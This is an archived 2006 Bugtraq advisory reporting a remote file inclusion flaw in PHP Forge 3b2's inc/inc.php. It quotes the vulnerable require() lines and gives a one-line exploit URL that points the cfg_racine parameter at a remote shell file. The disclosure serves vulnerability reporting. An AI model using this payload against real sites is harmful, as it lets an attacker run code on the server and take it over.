lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 15 Oct 2006 00:05:30 +0000
From: "mahmood ali" <mah_k_2000@...mail.com>
To: bugtraq@...urityfocus.com
Subject: PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability

PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############

Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############

Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############

Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############

Discoverd By :  Mahmood_ali
Conatact :      mah_k_2000@...mail.com
############

Special Greetings :_ Tryag-Team
############

bugtraq@...urityfocus.com

submit@...w0rm.com

_________________________________________________________________
The new Windows Live Toolbar helps you guard against viruses 
http://toolbar.live.com/?mkt=en-gb

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ